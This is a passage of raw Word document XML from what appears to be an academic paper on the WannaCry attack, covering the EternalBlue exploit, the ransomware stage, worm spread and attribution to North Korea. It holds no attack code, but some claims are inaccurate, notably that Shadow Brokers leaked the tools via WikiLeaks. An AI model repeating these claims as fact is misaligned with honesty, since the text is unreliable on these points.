      </w:pPr>
      <w:r>
        <w:t>The first stage of the ‘WannaCry’ malware utilised the ‘Eternal Blue’ SMB</w:t>
      </w:r>
      <w:r w:rsidR="004D7044">
        <w:t xml:space="preserve"> port 445</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> remote exploitation malware that was originally </w:t>
      </w:r>
      <w:r w:rsidR="004D7044">
        <w:t>developed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by the National Security Agency (NSA) within the US</w:t>
      </w:r>
      <w:r w:rsidR="004D7044">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that was subsequently </w:t>
      </w:r>
      <w:r w:rsidR="00330B7F">
        <w:t>stolen and then leaked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00330B7F">
        <w:t xml:space="preserve">‘Shadow Brokers’ an alleged Russian security services funded elite hacking group </w:t>
      </w:r>
      <w:r>
        <w:t>on the infamous WikiLeaks website owned and operated by Julian Assange</w:t>
      </w:r>
      <w:r w:rsidR="00330B7F">
        <w:t xml:space="preserve"> on the 14</w:t>
      </w:r>
      <w:r w:rsidR="00330B7F" w:rsidRPr="00330B7F">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00330B7F">
        <w:t xml:space="preserve"> of April 2017 according to the NSA along with other military</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00330B7F">
        <w:t>grade hacking tools,</w:t>
      </w:r>
      <w:r w:rsidR="004D7044">
        <w:t xml:space="preserve"> which made th</w:t>
      </w:r>
      <w:r w:rsidR="00330B7F">
        <w:t>ese</w:t>
      </w:r>
      <w:r w:rsidR="004D7044">
        <w:t xml:space="preserve"> powerful hacking tool to be </w:t>
      </w:r>
      <w:r w:rsidR="000929F0">
        <w:t xml:space="preserve">easily </w:t>
      </w:r>
      <w:r w:rsidR="004D7044">
        <w:t xml:space="preserve">obtained </w:t>
      </w:r>
      <w:r w:rsidR="00330B7F">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="000929F0">
        <w:t xml:space="preserve">anyone with </w:t>
      </w:r>
      <w:r w:rsidR="00330B7F">
        <w:t xml:space="preserve">public </w:t>
      </w:r>
      <w:r w:rsidR="000929F0">
        <w:t>access to the Internet</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00330B7F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"http://www.hackingarticles.in/exploit-remote-windows-pc-eternalblue-doublepulsar-exploit-metasploit/","accessed":{"date-parts":[["2018","5","23"]]},"author":[{"dropping-particle":"","family":"hackingarticles.com","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"hackingarticles.com","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"page":"1","title":"Exploit Remote Windows PC with Eternalblue &amp;amp; Doublepulsar Exploit in Metasploit","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=9293f04b-b802-3142-a3c0-ddb15c885bb6"]}],"mendeley":{"formattedCitation":"[13]","plainTextFormattedCitation":"[13]","previouslyFormattedCitation":"[13]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[13]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="119ECD50" w14:textId="77777777" w:rsidR="00330B7F" w:rsidRDefault="00330B7F" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420CE928" w14:textId="2BAC2483" w:rsidR="008B35A0" w:rsidRDefault="00330B7F" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>‘Shadow Brokers’ along with other reported state</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">funded elite hacking groups will be discussed in further details within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00330B7F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Rogue State Sponsored Hacking Groups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00330B7F">
        <w:t>sub-section of this paper.</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Windows zero-days, SWIFT bank hacks, slick exploit loader among the contents.","author":[{"dropping-particle":"","family":"Goodin","given":"Dan","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Ars Technica","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"NSA-leaking Shadow Brokers just dumped its most damaging release yet","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=d7bde584-82d1-45ae-ae08-aa5a62d0b2b0"]}],"mendeley":{"formattedCitation":"[14]","plainTextFormattedCitation":"[14]","previouslyFormattedCitation":"[14]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="009B343A" w:rsidRPr="009B343A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[14]</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7517DB29" w14:textId="0C61E6DE" w:rsidR="00746AD4" w:rsidRPr="00746AD4" w:rsidRDefault="00746AD4" w:rsidP="00746AD4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746AD4">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59572139" w14:textId="754C6E4A" w:rsidR="00D82FE1" w:rsidRDefault="008B35A0" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The second stage of the attack comprised of additional malware called ‘Ransomware’ that locates important documents stored within a system such as</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:t>.XML .PDF. .DOC files</w:t>
      </w:r>
      <w:r w:rsidR="00427EB7">
        <w:t xml:space="preserve"> etc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that is owned by a company such </w:t>
      </w:r>
      <w:r w:rsidR="00014E39">
        <w:t>as;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accounting information, personal medical files, business memos/</w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t>strategies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t>intellectual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> property</w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t>, private E-mail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> etc</w:t>
      </w:r>
      <w:r w:rsidR="000929F0">
        <w:t xml:space="preserve">. Once these important documents are located the ‘WannaCry’ malware </w:t>
      </w:r>
      <w:r>
        <w:t>then u</w:t>
      </w:r>
      <w:r w:rsidR="000929F0">
        <w:t xml:space="preserve">tilised </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a cryptographic </w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t>algorithm</w:t>
      </w:r>
      <w:r w:rsidR="000929F0">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:t>Advanced Encryption Standard – 256bit</w:t>
      </w:r>
      <w:r w:rsidR="00427EB7">
        <w:t xml:space="preserve"> (AES-256)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00427EB7">
        <w:t>encrypt</w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t xml:space="preserve"> the documents with a decryption key only known by the attacker. AES-256 is </w:t>
      </w:r>
      <w:r w:rsidR="00427EB7">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">military grade </w:t>
      </w:r>
      <w:r w:rsidR="00427EB7">
        <w:t>cryptographic algorithm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t xml:space="preserve">that has never been cracked. Once the entire system has been encrypted a ‘Ransom’ interface </w:t>
      </w:r>
      <w:r w:rsidR="00FD2FA7">
        <w:t xml:space="preserve">appeared demanding </w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t>payment</w:t>
      </w:r>
      <w:r w:rsidR="00FD2FA7">
        <w:t xml:space="preserve"> of $300 for each affected device</w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t xml:space="preserve"> in untraceable </w:t>
      </w:r>
      <w:r w:rsidR="004A4A13">
        <w:t xml:space="preserve">digital currency </w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t>‘Bitcoin’</w:t>
      </w:r>
      <w:r w:rsidR="00427EB7">
        <w:t xml:space="preserve"> to the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t xml:space="preserve"> in exchange for the decryption key.</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.4324/9781315380780-37","abstract":"In computer virology, advanced encryption algorithms, on the bright side, can be utilized to effectively protect valuable information assets of enterprises. Yet, on the dark side, they can also be of use for malicious attackers to conduct pernicious activities. This article attempts to discover the surreptitious features of ransomware and to address it in information systems security research. It intends to elicit attention from enterprises with regard to ransomware—a newly emerged cyber hackjacing threat using such encryption technology as RSA—and to help both academic researchers and IT practitioners understand the technological characteristics of ransomware, along with its severity analysis. As ransomware infections continue to rise, and attacks employing refined algorithm become increasingly sophisticated, data protection faces serious challenges. This chapter draws a ransomware extortion scheme, compares ransomware with other malware, and discusses future trends and research directions in an effort to cater to both practitioners and researchers.","author":[{"dropping-particle":"","family":"Youngblood","given":"James R.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Business Theft and Fraud","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"Ransomware","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=dbe2dd32-f5c7-4b8b-b72c-547bb766181c"]}],"mendeley":{"formattedCitation":"[15]","plainTextFormattedCitation":"[15]","previouslyFormattedCitation":"[15]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="009B343A" w:rsidRPr="009B343A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D8FB76" w14:textId="436C767D" w:rsidR="00746AD4" w:rsidRPr="00020609" w:rsidRDefault="00020609" w:rsidP="00020609">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020609">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Network Propagating</w:t>
      </w:r>
      <w:r w:rsidR="00746AD4" w:rsidRPr="00020609">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF75652" w14:textId="38AD4E77" w:rsidR="00D82FE1" w:rsidRDefault="00D82FE1" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The third stage of the ‘WannaCry’ attack utilised a worm to pivot through the network infrastructure looking for devices that </w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerable to the ‘Eternal Blue’ remote exploitation </w:t>
      </w:r>
      <w:r w:rsidR="0029349B">
        <w:t>malware,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to further encrypt documents for ransom and then </w:t>
      </w:r>
      <w:r w:rsidR="0029349B">
        <w:t>conti</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t>nue</w:t>
      </w:r>
      <w:r w:rsidR="00C845A3">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve"> to move </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">through the </w:t>
      </w:r>
      <w:r w:rsidR="00C845A3">
        <w:t xml:space="preserve">LAN within each of the </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00C845A3">
        <w:t>ffected institutions/businesses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00C845A3">
        <w:t xml:space="preserve"> then</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C845A3">
        <w:t>back through</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Internet looking to infect as many machines as possible</w:t>
      </w:r>
      <w:r w:rsidR="00C845A3">
        <w:t xml:space="preserve"> were vulnerable to the malware.</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Network worms are a clear and growing threat to the security of today's Internet-connected hosts and networks. The combination of the Internet's unrestricted connectivity and widespread software homogeneity allows network pathogens to exploit tremendous parallelism in their propagation. In fact, modern worms can spread so quickly, and so widely, that no human-mediated reaction can hope to contain an outbreak.\\nIn this paper, we propose an automated approach for quickly detecting previously unknown worms and viruses based on two key behavioral characteristics - a common exploit sequence together with a range of unique sources generating infections and destinations being targeted. More importantly, our approach - called \"content sifting\" - automatically generates precise signatures that can then be used to filter or moderate the spread of the worm elsewhere in the network.\\nUsing a combination of existing and novel algorithms we have developed a scalable content sifting implementation with low memory and CPU requirements. Over months of active use at UCSD, our Earlybird prototype system has automatically detected and generated signatures for all pathogens known to be active on our network as well as for several new worms and viruses which were unknown at the time our system identified them. Our initial experience suggests that, for a wide range of network pathogens, it may be practical to construct fully automated defenses - even against so-called \"zero-day\" epidemics.","author":[{"dropping-particle":"","family":"Singh","given":"Sumeet","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Estan","given":"Cristian","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Varghese","given":"George","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Savage","given":"Stefan","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Symposium on Operation Systems Design and Implementation","id":"ITEM-1","issued":{"date-parts":[["2004"]]},"title":"Automated Worm Fingerprinting","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=f6d362ec-5051-4e92-b7a5-0fd3cc6055f9"]}],"mendeley":{"formattedCitation":"[16]","plainTextFormattedCitation":"[16]","previouslyFormattedCitation":"[16]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="009B343A" w:rsidRPr="009B343A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[16]</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EEBDD0" w14:textId="38F4AD5A" w:rsidR="00D82FE1" w:rsidRDefault="00D82FE1" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352C4CC9" w14:textId="70F34989" w:rsidR="00443638" w:rsidRDefault="00D82FE1" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cybersecurity </w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t>professionals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and politic</w:t>
      </w:r>
      <w:r w:rsidR="00C845A3">
        <w:t>al advisors</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C845A3">
        <w:t xml:space="preserve">within Europe </w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t>viewed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this attack as a Denial of Service</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve"> (DoS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack by </w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve">a rogue state that implied its true motive was to not </w:t>
      </w:r>
      <w:r w:rsidR="00A11257">
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve">use the </w:t>
      </w:r>
      <w:r w:rsidR="00014E39">
        <w:t>ransomware</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve"> for economic gain but to </w:t>
      </w:r>
      <w:r w:rsidR="00A11257">
        <w:t xml:space="preserve">the true motive was to </w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve">test the security infrastructure of European countries in order to cripple their </w:t>
      </w:r>
      <w:r w:rsidR="00A11257">
        <w:t>critical</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve"> institutions</w:t>
      </w:r>
      <w:r w:rsidR="00014E39">
        <w:t xml:space="preserve">  within future attacks</w:t>
      </w:r>
      <w:r w:rsidR="00A11257">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D82C7B">
        <w:t>such as</w:t>
      </w:r>
      <w:r w:rsidR="00020609">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00D82C7B">
        <w:t xml:space="preserve"> powerplants, military bases, and water pumping </w:t>
      </w:r>
      <w:r w:rsidR="00020609">
        <w:t>plants</w:t>
      </w:r>
      <w:r w:rsidR="00A11257">
        <w:t xml:space="preserve"> as previously discussed</w:t>
      </w:r>
      <w:r w:rsidR="00020609">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1002/9780470099742.ch8","ISBN":"9780470099742","abstract":"Availability requires that computer systems function normally without loss of resources to legitimate users. One of the most challenging issues to availability is the denial-of- service (DoS) attack. DoS attacks constitute one of the major threats and among the hardest security problems in today’s Internet. The main aim of a DoS is the disruption of services by attempting to limit access to a machine or service. Depending on the attackers’ strategy, the target resources may be the fi le system space, the process space, the network band- width, or the network connections. These attacks achieve their goal by sending at a victim a stream of packets in order to exhaust the bandwidth of its network traffi c or its process- ing capacity denying or degrading service to legitimate users. There have been some large-scale attacks targeting high-profi le Internet sites [1–3]. Distributed denial-of-service (DDoS) attacks add the many-to-one dimension to the DoS problem, making the prevention and mitigation of such attacks more diffi cult and the impact proportionally severe. These attacks use many Internet hosts in order to exhaust the resources of the target and cause DoS to legitimate clients. The traffi c is usually so aggregated that it is diffi cult to distinguish legitimate packets from attack packets. More importantly, the attack volume can be larger than the system can handle. There are no apparent characteristics of DDoS streams that could be directly and wholesalely used for their detection and fi ltering. The attacks achieve their desired effect by sending large amounts of network traffi c and by varying packet fi elds in order to avoid characterization and tracing. Extremely sophisticated, “user-friendly,” and power- ful DDoS toolkits are available to potential attackers, increasing the danger of becoming a victim in a DoS or a DDoS attack, as essential systems are ill prepared to defend themselves.","author":[{"dropping-particle":"","family":"Mitrokotsa","given":"Aikaterini","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Douligeris","given":"Christos","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Network Security: Current Status and Future Directions","id":"ITEM-1","issued":{"date-parts":[["2007"]]},"title":"Denial-of-Service Attacks","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=ccd50536-a731-40ee-b38a-329940407f82"]}],"mendeley":{"formattedCitation":"[17]","plainTextFormattedCitation":"[17]","previouslyFormattedCitation":"[17]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="009B343A" w:rsidRPr="009B343A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[17]</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="002D683D" w14:textId="77777777" w:rsidR="00443638" w:rsidRDefault="00443638" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAB38E7" w14:textId="51B0F262" w:rsidR="00D82FE1" w:rsidRDefault="00020609" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve">he economic gain </w:t>
      </w:r>
      <w:r w:rsidR="00D82C7B">
        <w:t xml:space="preserve">from the WannaCry attack </w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">viewed </w:t>
      </w:r>
      <w:r w:rsidR="00D82C7B">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="00FD2FA7">
        <w:t>politicians</w:t>
      </w:r>
      <w:r w:rsidR="00D82C7B">
        <w:t xml:space="preserve"> and government advisors </w:t>
      </w:r>
      <w:r w:rsidR="00FD5F23">
        <w:t>as a</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve"> bonus to a poor state</w:t>
      </w:r>
      <w:r w:rsidR="00D82C7B">
        <w:t xml:space="preserve"> such as North Korea</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A11257">
        <w:t xml:space="preserve">that has large economic sanctions imposed within its country for rogue behaviour by the US and European governments </w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t>to further fund their ongoing nuclear programme</w:t>
      </w:r>
      <w:r w:rsidR="00443638">
        <w:t xml:space="preserve"> and also as a retaliation to the sanctions these countries imposed on  the North Korean state</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"The Trump administration has publicly blamed North Korea for unleashing the so-called WannaCry cyber attack that crippled hospitals, banks and other companies across the globe earlier this year","author":[{"dropping-particle":"","family":"Reuters","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Reuters","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"U.S. blames North Korea for 'WannaCry' cyber attack","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=c17bf1bb-668b-499b-bbb2-5e53c6ef27e6"]}],"mendeley":{"formattedCitation":"[18]","plainTextFormattedCitation":"[18]","previouslyFormattedCitation":"[18]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="009B343A" w:rsidRPr="009B343A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[18]</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BD8A01" w14:textId="4764014F" w:rsidR="00F83130" w:rsidRDefault="00F83130" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514D2E1C" w14:textId="5DA1EBC1" w:rsidR="00D84DC9" w:rsidRDefault="00F83130" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WannaCry similarly to the Stuxnet malware was ultimately successful </w:t>
      </w:r>
      <w:r w:rsidR="00875592">
        <w:t>due to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> human error </w:t>
      </w:r>
      <w:r w:rsidR="00FD2FA7">
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this attack was </w:t>
      </w:r>
      <w:r w:rsidR="00FD2FA7">
        <w:t>preventable</w:t>
      </w:r>
      <w:r w:rsidR="00020609">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00875592">
        <w:t xml:space="preserve"> because</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a patch was </w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t xml:space="preserve">readily </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">available by Microsoft at the time of the attack that would of prevented </w:t>
      </w:r>
      <w:r w:rsidR="00875592">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> version of ‘Eternal Blue’ </w:t>
      </w:r>
      <w:r w:rsidR="00875592">
        <w:t xml:space="preserve">used within the ‘WannaCry’ malware </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">remotely exploiting the NHS systems and other institutions around Europe </w:t>
      </w:r>
      <w:r w:rsidR="00D84DC9">
        <w:t>such as the ‘Gas’ and ‘Water’ crit</w:t>
      </w:r>
      <w:r w:rsidR="00020609">
        <w:t>ical</w:t>
      </w:r>
      <w:r w:rsidR="00D84DC9">
        <w:t xml:space="preserve"> infrastructure</w:t>
      </w:r>
      <w:r w:rsidR="00875592">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D84DC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00100743">
        <w:t>within</w:t>
      </w:r>
      <w:r w:rsidR="00D84DC9">
        <w:t xml:space="preserve"> Spain</w:t>
      </w:r>
      <w:r w:rsidR="008C78F6">
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidR="008C78F6" w:rsidRPr="008C78F6">
        <w:t>Russian Interior Ministry</w:t>
      </w:r>
      <w:r w:rsidR="00D84DC9">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00020609">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00D84DC9">
